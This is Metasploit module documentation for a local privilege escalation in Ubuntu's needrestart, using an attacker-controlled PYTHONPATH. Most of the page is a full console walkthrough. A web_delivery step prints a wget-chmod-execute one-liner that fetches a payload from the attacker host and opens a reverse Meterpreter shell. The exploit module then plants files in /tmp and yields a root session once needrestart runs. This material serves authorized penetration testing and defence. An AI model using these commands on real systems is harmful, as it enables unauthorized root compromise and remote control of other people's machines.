ContextQMD
Back to Metasploit Framework

Ubuntu Needrestart Lpe

documentation/modules/exploit/linux/local/ubuntu_needrestart_lpe.md

6.4.1314.6 KB
Original Source

Vulnerable Application

Local attackers can execute arbitrary code as root by tricking needrestart into running the Python interpreter with an attacker-controlled PYTHONPATH environment variable.

Verified against Ubuntu 22.04 with needrestart 3.5-5ubuntu2.1

Exploitation against vulnerable needrestart versions on Debian 12 and Fedora 39 were unsuccessful however install and run instructions are listed below.

Debian

Install: apt-get install needrestart=3.6-4+deb12u1

Binary location: /usr/sbin/needrestart

Fedora 39

Install: dnf install needrestart-3.6-9.fc39.noarch

Binary location: /usr/sbin/needrestart

Verification Steps

  1. Install the application
  2. Start msfconsole
  3. Get an initial shell
  4. Do: use exploit/linux/local/ubuntu_needrestart_lpe
  5. Do: set lhost <ip>
  6. Do: set lport <port>
  7. Do: set session <session>
  8. Do: run
  9. You should get a root shell.

Options

ListenerTimeout

The maximum number of seconds to wait for session. Defaults to 90,000 which is 25hrs.

Scenarios

Ubuntu 22.04 with needrestart 3.5-5ubuntu2.1

Gain initial shell

msf > use exploit/multi/script/web_delivery
998
run[*] Using configured payload python/meterpreter/reverse_tcp
msf exploit(multi/script/web_delivery) > set target 7
target => 7
msf exploit(multi/script/web_delivery) > set payload linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
msf exploit(multi/script/web_delivery) > set lhost 1.1.1.1
lhost => 1.1.1.1
msf exploit(multi/script/web_delivery) > set lport 4998
lport => 4998
msf exploit(multi/script/web_delivery) > set srvport 8998
srvport => 8998
msf exploit(multi/script/web_delivery) > run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
msf exploit(multi/script/web_delivery) > 
[*] Started reverse TCP handler on 1.1.1.1:4998 
[*] Using URL: http://1.1.1.1:8998/dKtdkMS
[*] Server started.
[*] Run the following command on the target machine:
wget -qO Ejq8lHli --no-check-certificate http://1.1.1.1:8998/dKtdkMS; chmod +x Ejq8lHli; ./Ejq8lHli& disown
[*] 2.2.2.2   web_delivery - Delivering Payload (250 bytes)
[*] Sending stage (3045380 bytes) to 2.2.2.2
[*] Meterpreter session 1 opened (1.1.1.1:4998 -> 2.2.2.2:52004) at 2024-11-22 12:07:55 -0500

msf exploit(multi/script/web_delivery) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: h00die
meterpreter > background
[*] Backgrounding session 1...

Priv Esc

msf exploit(multi/script/web_delivery) > use exploit/linux/local/ubuntu_needrestart_lpe
[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp
msf exploit(linux/local/ubuntu_needrestart_lpe) > set payload linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
msf exploit(linux/local/ubuntu_needrestart_lpe) > set lhost 1.1.1.1
lhost => 1.1.1.1
msf exploit(linux/local/ubuntu_needrestart_lpe) > set lport 4977
lport => 4977
msf exploit(linux/local/ubuntu_needrestart_lpe) > set session 1
session => 1
msf exploit(linux/local/ubuntu_needrestart_lpe) > set verbose true
verbose => true
msf exploit(linux/local/ubuntu_needrestart_lpe) > run

[*] Started reverse TCP handler on 1.1.1.1:4977 
[*] Running automatic check ("set AutoCheck false" to disable)

[+] The target appears to be vulnerable. Vulnerable needrestart version 3.5-5ubuntu2.1 detected on Ubuntu 22.04
[*] Writing '/tmp/.1K8Hy2tOtq' (250 bytes) ...
[*] Uploading payload: /tmp/.1K8Hy2tOtq
[*] Creating directory /tmp/importlib
[*] /tmp/importlib created
[*] Uploading c_stub: /tmp/importlib/__init__.so
[*] Uploading py_script: /tmp/.FzzlJ
[*] Launching exploit, and waiting for needrestart to run...

On the remote Ubuntu box run sudo needrestart

[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3045380 bytes) to 2.2.2.2
[*] chown: changing ownership of '/tmp/.1K8Hy2tOtq': Operation not permitted
[*] Error processing line 1 of /usr/lib/python3/dist-packages/zope.interface-5.4.0-nspkg.pth:
[*] 
[*]   Traceback (most recent call last):
[*]     File "/usr/lib/python3.10/site.py", line 192, in addpackage
[*]       exec(line)
[*]     File "<string>", line 1, in <module>
[*]   ImportError: dynamic module does not define module export function (PyInit_importlib)
[*] 
[*] Remainder of file ignored
[*] #########################
[*] 
[*] Dont mind the error message above
[*] 
[*] Waiting for needrestart to run...
[*] Payload owned by: root
[+] Deleted /tmp/.1K8Hy2tOtq
[+] Deleted /tmp/.FzzlJ
[+] Deleted /tmp/importlib
[*] Meterpreter session 2 opened (1.1.1.1:4977 -> 2.2.2.2:57644) at 2024-11-22 12:08:28 -0500

meterpreter > 
meterpreter > getuid
Server username: root